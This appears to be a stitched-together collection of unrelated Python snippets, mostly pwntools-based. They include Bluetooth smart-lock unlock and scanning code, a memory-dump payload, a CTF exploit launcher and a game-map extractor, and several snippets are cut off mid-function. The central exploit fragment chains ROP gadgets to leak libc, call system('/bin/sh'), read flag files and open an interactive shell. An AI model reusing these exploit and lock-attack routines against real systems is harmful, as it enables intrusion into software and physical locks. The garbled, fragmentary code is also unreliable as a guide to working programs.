def handleNotification(self,cHandle,enc_data):
try:
data = self.AES.decrypt(enc_data)
except Exception as e:
log.failure(f"Cant decrypt {enc_data} with {self.AES_KEY} err: {e}")
return
log.debug(f'Notification received from: {cHandle} \nenc_data: {enc_data}\ndata: {data}')
if data.startswith(bytes([0xcb])):
log.success("received : withResponse of last command")
elif data.startswith(self.RESP_GET_BATTERY_FAIL):
log.failure(f"received: GET BATTERY FAIL")
elif data.startswith(self.RESP_GET_BATTERY_SUCCESS):
log.success(f"received: GET BATTERY SUCCESS {data}")
elif data.startswith(self.RESP_TOKEN):
log.success(f"received: TOKEN RECEIVED ! {data[3:7]}")
self.portunus.assign_token(data[3:7])
elif data.startswith(self.RESP_UNLOCK_SUCCESS):
log.success("received: UNLOCKED")
elif data.startswith(self.RESP_UNLOCK_FAIL):
log.failure("received: UNLOCK FAILED")
elif data.startswith(self.LOCK_STATE_LOCKED):
log.success("received: LOCK STATE : LOCKED")
elif data.startswith(self.LOCK_STATE_UNLOCKED):
log.success("received: LOCK STATE : UNLOCKED")
else:
print(f"Unknown data {data}")
def zeroftp_login(username, password):
payload = zero_pack_int(0x1, endian='big')
payload += zero_pack_string(username)
payload += zero_pack_raw(md5sum(password))
zero_send(payload)
if zero_recv() == 1:
log.debug('login success')
else:
log.debug('login fail')
def get_process_list(self, location, process_name):
if location == "host":
pids = self.get_host_process_list(process_name)
elif location == "device":
pids = self.get_device_process_list(process_name)
else:
log.warning("The location should be either host or device.")
return None
log.debug("pids: %s" % str(pids))
return pids
def payload_dump_mem(r, tar_addr, num_bytes, addhook_ind):
"""
This function uses payloads/dump_mem to dump memory contents.
"""
answ = invoke_add_hook(r, addhook_ind,
"A" + struct.pack(">II", tar_addr, num_bytes))
log.debug("[payload_dump_mem] answ (len: {}): {}".format(len(answ), answ))
assert (answ.startswith("Ok"))
contents = recv_many(r, verbose=True)
return contents
def find_gadget(self, insns):
if type(insns) is str:
insns = [insn.strip() for insn in insns.split(';')]
found_gadget = super(BlkROP, self).find_gadget(insns)
if not found_gadget:
raise Exception('Gadget %s not found' % insns)
log.debug('ROP 0x%x %s' %
(found_gadget.address, ' ; '.join(found_gadget.insns)))
return found_gadget
def exeute_cmd(cmdline):
log.debug("cmd: %s" % cmdline)
cmdline = cmdline
try:
# p = os.popen(cmdline)
# reply = p.read()
reply = subprocess.check_output(
cmdline, stderr=subprocess.STDOUT, shell=True, executable="/bin/bash").decode('utf-8')
# p = subprocess.Popen(cmdline, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
# reply = p.stdout.read().decode()
except Exception as e:
reply = e.output.decode('utf-8', errors='ignore')
log.debug("reply: %s" % reply)
sleep(1)
return reply
def main():
context.log_level = 'info'
io = connect()
o = order(io, 9)
log.debug('Original Order: ' + o)
progress = log.progress('Finding flag')
for key_len in xrange(8, 32):
progress.status('Trying key length of ' + str(key_len))
modified = modify(o, key_len)
log.debug('Modified Order: ' + modified)
try:
m, p, flag = pay(io, modified)
progress.success(flag)
break
except Exception as e:
progress.status('Key length ' + str(key_len) + ' failed: ' + str(e))
io.close()
def send_command(self,command:BLECommand):
data_to_send = command.getData()
if command.isPassRequired():
data_to_send += self.LOCK_PASS
if command.isTokenRequired():
data_to_send += self.token
if len(data_to_send) < 16:
data_to_send += bytes(range(len(data_to_send),16))
assert len(data_to_send)==16
log.debug(f"sending bytes {data_to_send}")
enc_data = self.AES.encrypt(data_to_send)
log.debug(f"sending encrypted bytes {enc_data}")
ch = self.device.getCharacteristics(uuid=self.WRITE_TO)[0]
ch.write(enc_data,True)
self.wait_for_notification()
self.wait_for_notification()
def zero_unpack(payload):
zero_info = ord(payload[0])
zero_basic_types = BITS(zero_info, 0, 3)
assert zero_basic_types < 6
if zero_basic_types == 1:
log.debug('recv: bool')
ret = zero_unpack_bool(payload)
elif zero_basic_types == 2:
log.debug('recv: string')
ret = zero_unpack_string(payload)
elif zero_basic_types == 3:
log.debug('recv: raw')
ret = zero_unpack_raw(payload)
elif zero_basic_types == 4:
log.debug('recv: int')
ret = zero_unpack_int(payload)
elif zero_basic_types == 5:
log.debug('recv: list')
ret = zero_unpack_list(payload)
return ret
def main():
if len(sys.argv) < 2:
usage()
binary = sys.argv[1]
try:
elf = ELF(binary)
except:
myExit("Problem with binary path " + binary)
ldPath = None
libc = None
libcPath = None
DEBUG = False
REMOTE = False
env = {}
i = 2
while i < len(sys.argv):
opt = sys.argv[i]
if opt == Mode.DEBUG:
log.debug("Enable gdb mode")
DEBUG = True
i += 1
elif opt == Mode.REMOTE:
try:
host = sys.argv[i + 1]
port = sys.argv[i + 2]
except:
myExit("Problem with -r HOST PORT")
log.debug("Enable remote connection to ", host, port)
REMOTE = True
i += 3
elif opt == Mode.LIBC:
try:
libcVersion = sys.argv[i + 1]
except:
myExit("Problem with -l PathToLibC")
log.debug("Set Library version to", libcVersion)
# PATH_CUSTOM_GLIBC = PATH_GLIBC % libcVersion
for file in listdir(PATH_LIBS):
if file.startswith("ld") and libcVersion in file:
ldPath = path.join(PATH_LIBS, file)
if file.startswith("libc") and libcVersion in file:
libcPath = path.join(PATH_LIBS, file)
# libcPath = "/lib/x86_64-linux-gnu/libc-2.27.so"
env = {"LD_PRELOAD": libcPath}
libc = ELF(libcPath)
i += 2
else:
myExit("Unknown option only -d -l -ld -r")
if not libc:
libc = elf.libc
if REMOTE:
r = remote(host, int(port))
else:
if ldPath is None:
r = process(binary, env=env)
else:
r = process([ldPath, binary], env=env)
if DEBUG:
# Example
# bp = [elf.sym["malloc"]]
# bp = ["malloc"]
debug(r, bp, elf)
exploit(r, elf, libc)
def reconnect(self):
log.debug("reconnect %s" % self.serial)
self.adb("reconnect")
sleep(5)
self.host_shell("/usr/bin/adb reconnect offline")
def extract_map(map_dir: str, progress: Progress):
maps = {}
for map_name in os.listdir(map_dir):
# Ignore some unsupported maps
if (not os.path.isdir(f"{map_dir}/{map_name}")
or "EntryMap" in map_name or "Forest" in map_name
or "Jensens_Range" in map_name or "Tutorial" in map_name
or "Fallujah" == map_name):
continue
progress.status(map_name)
# Some maps have their Gameplay Layers in a subdirectory called Gameplay_Layers.
# For maps that don't have the Gameplay_Layers subdirectory, all the
# umap files in the map root directory are gameplay layers.
# (I hope this doesn't change at some point.
# Otherwise we'll try to process lighting layer umap files and will probably
# crash at some point.)
gameplay_layer_dir = f"{map_dir}/{map_name}"
if "Gameplay_Layers" in os.listdir(gameplay_layer_dir):
gameplay_layer_dir += "/Gameplay_Layers"
for layer in os.listdir(gameplay_layer_dir):
# ignore non-umap files
if not layer.endswith(".umap"):
continue
layer = layer.replace(".umap", "")
# only process supported game modes
game_mode = None
for gm in GAME_MODES:
if gm.casefold() in layer.casefold():
game_mode = gm
break
if game_mode is None:
continue
progress.status(f"{map_name} - {layer}")
# extract map information from umap with umodel
yaml_filename = f"{config.LAYER_DUMP_DIR}/{layer}.yaml"
if not os.path.isfile(yaml_filename):
if context.log_level <= logging.DEBUG:
stderr = sys.stderr
else:
stderr = subprocess.DEVNULL
yaml_content = subprocess.check_output(
[
config.UMODEL_PATH,
f"{gameplay_layer_dir}/{layer}.umap",
"-game=ue4.24",
"-dump",
],
stderr=stderr,
)
log.debug(yaml_content.decode("UTF-8"))
_, _, yaml_content = yaml_content.partition(b"---")
with open(yaml_filename, "wb") as f:
f.write(yaml_content)
# help the GC a little
del yaml_content
with open(yaml_filename, "r") as f:
docs = list(yaml.safe_load_all(f))
# build lane graph from map info
lane_graph, clusters, mains = get_lane_graph_and_clusters(docs)
# get map bounds from map info by looking at the two MapTexture objects
bounds = []
for obj in docs:
sdk_name = list(obj.keys())[0]
_, _, sdk_name = sdk_name.rpartition(".")
# ignore everything that's not the MapTexture object
if not sdk_name.startswith("MapTexture"):
continue
x, y = absolute_location(access_one(obj)["RootComponent"])
bounds.append((x, y))
# we should have exactly two bounding coordinates
# (e.g., north-east and south-west)
assert len(bounds) == 2
# get minimap filename from import table
# note that some CAF maps use the minimap from vanilla maps, so they
# don't have a minimap file themself
minimap_name = None
table_dump_filename = f"{config.LAYER_DUMP_DIR}/{layer}.tabledump.txt"
if not os.path.isfile(table_dump_filename):
table_dump = subprocess.check_output(
[
config.UMODEL_PATH,
f"{gameplay_layer_dir}/{layer}.umap",
"-game=ue4.24",
"-list",
],
stderr=subprocess.DEVNULL,
)
with open(table_dump_filename, "wb") as f:
f.write(table_dump)
with open(table_dump_filename, "r") as f:
table_dump = f.read()
# extract minimap image (.tga) with umodel
for name in table_dump.splitlines():
match = re.match(
f"[0-9]+ = .*/Maps/(.*/(Minimap|Masks)/(.*inimap.*))",
name)
if match is None:
continue
minimap_path_in_package, minimap_name = match.group(1, 3)
# skip if minimap already exists
os.makedirs(config.FULLSIZE_MAP_DIR, exist_ok=True)
if os.path.isfile(
f"{config.FULLSIZE_MAP_DIR}/{minimap_path_in_package}.tga"
):
break
umodel_cmd = [
config.UMODEL_PATH,
f"-export",
f"{map_dir}/{minimap_path_in_package}.uasset",
f"-game=ue4.24",
f"-out={config.LAYER_DUMP_DIR}",
]
assert (subprocess.call(
umodel_cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) == 0), "map extract failed"
# ignore maps smaller than 1 MiB
# (might be a thumbnail)
if (os.stat(f"{config.LAYER_DUMP_DIR}/{minimap_name}.tga").
st_size < 1 * 1024 * 1024):
minimap_name = None
continue
subprocess.call([
"mv",
f"{config.LAYER_DUMP_DIR}/{minimap_name}.tga",
f"{config.FULLSIZE_MAP_DIR}",
])
break
MAP_RENAMES = {
"Al_Basrah_City": "Al Basrah",
"BASRAH_CITY": "Al Basrah",
"Belaya": "Belaya Pass",
"Fallujah_City": "Fallujah",
"Mestia_Green": "Mestia",
}
pretty_map_name = map_name
pretty_map_name = MAP_RENAMES.get(
pretty_map_name) or pretty_map_name
pretty_map_name = pretty_map_name.replace("_", " ")
# strip out map name from layer name
is_caf = layer.startswith("CAF_") # don't strip out CAF prefix
layer_game_mode_index = layer.casefold().index(
game_mode.casefold())
pretty_layer_name = (
game_mode + layer[layer_game_mode_index + len(game_mode):])
pretty_layer_name = pretty_layer_name.strip()
pretty_layer_name = pretty_layer_name.replace("_", " ")
if is_caf:
pretty_layer_name = "CAF " + pretty_layer_name
assert pretty_map_name != ""
assert pretty_layer_name != ""
assert (minimap_name is not None
), f"{pretty_map_name}/{pretty_layer_name} has no minimap"
layer_data = {
"background": {
"corners": [{
"x": p[0],
"y": p[1]
} for p in bounds],
"minimap_filename": minimap_name,
"heightmap_filename":
f"height-map-{pretty_map_name.rpartition(' ')[0].lower()}C1",
"heightmap_transform": {
"shift_x": 0,
"shift_y": 0,
"scale_x": 1.0,
"scale_y": 1.0,
},
},
"mains": mains,
"clusters": clusters,
"lanes": lane_graph,
}
if pretty_map_name not in maps:
maps[pretty_map_name] = {}
maps[pretty_map_name][pretty_layer_name] = layer_data
return maps
def exploit(self):
elf = self.elf
libc = self.libc
libc.symbols['OneGadget'] = 0x41320
libc.symbols['/bin/sh'] = 0x001633e8
base_data = 0x80
# (gdb) x/xg 0x00601560
# 0x601560: 0x0000001500000064
Turtle_say_sel_id = 0x0000001500000064
with self.get_process(ld_linux=True) as self.p:
# -- stage 1 ---------------------------------------------------------------
ADDR_turtle = self.get_turtle_address()
log.info('turtle : %s', hex(ADDR_turtle))
data = '%sEND'
ADDR_data = ADDR_turtle + base_data
rop_chain = ROP(elf)
rop_chain.printf(ADDR_data, elf.got['setvbuf'])
rop_chain.main()
log.debug('ROP CHAIN: \n%s', rop_chain.dump())
payload = Attack.create_fake_turtle(ADDR_turtle, rop_chain.chain(),
data, Turtle_say_sel_id)
assert ('\n' not in payload)
self.p.sendline(payload)
if args.GDB:
pause()
leak = self.p.recvuntil('END', drop=True)
ADDR_setvbuf = u64(leak.ljust(8, '\x00'))
libc.address = ADDR_setvbuf - libc.symbols['setvbuf']
ADDR_bin_sh = libc.symbols['/bin/sh']
log.info('setvbuf : %s', hex(ADDR_setvbuf))
log.info('libc : %s', hex(libc.address))
log.info('/bin/sh : %s', hex(ADDR_bin_sh))
# -- stage 2 ---------------------------------------------------------------
if args.GDB:
pause()
ADDR_turtle1 = self.get_turtle_address()
log.info('turtle2 : %s', hex(ADDR_turtle1))
data = '/bin/sh\x00'
ADDR_data = ADDR_turtle1 + base_data
rop_chain2 = ROP(libc)
rop_chain2.system(ADDR_bin_sh)
log.debug('ROP CHAIN: \n%s', rop_chain2.dump())
payload = Attack.create_fake_turtle(ADDR_turtle1,
rop_chain2.chain(), data,
Turtle_say_sel_id)
assert ('\n' not in payload)
self.p.sendline(payload)
self.p.sendline('ls -laF')
self.p.sendline('cat flag*')
self.p.interactive()
buckles = []
if len(devices) == 0:
log.warn("Where are you dude ? :X Maybe increase scan time ?")
exit()
c = 0
c2 = 0
totallen = len(devices)
with log.progress('Taking closer look to found devices') as progress:
for dev in devices:
time.sleep(0.2)
for (adtype, desc, value) in dev.getScanData():
if value == DEVICE_NAME:
log.debug(
f"Found {DEVICE_NAME} boi!\nRSSI: {dev.rssi} ADDR: {dev.addr} RAWDATA: {dev.rawData}"
)
c += 1
scanData = dev.rawData
log.success(
f"DEVICE INFO Numero: {c}\nAddr : {dev.addr}\nDevice id : {scanData[5:13]}\nBattery level: {int(scanData[14])}\nLock: {scanData[15]}"
)
buckles.append((dev.addr, dev.addrType))
c2 += 1
# try:
# p = Peripheral(dev.addr,dev.addrType)
# except:
# continue
# try:
# fs = p.getServiceByUUID(TARGET_SERVICEUUID)
# log.success("Found the other one! Gonna exploit")
n = args.size / args.block
logger.info('dumping %d block' % n)
fmt_path = os.path.join(args.dir, '%s.%%d.img' % args.base)
logger.info('format string for path: \'%s\'' % fmt_path)
telnet = Telnet('localhost', 4444)
msg = telnet.read_until('\n\r> ')
telnet.write('targets\n')
msg = telnet.read_until('\n\r> ')
logger.debug(msg)
running = True
errors_count = 0
it_idx = iter(xrange(args.start, args.end + 1 if args.end else n))
idx = 0
while running:
#for idx in xrange(args.start, args.end + 1 if args.end else n):
if errors_count == 0:
try:
idx = next(it_idx)
except StopIteration:
running = False
continue
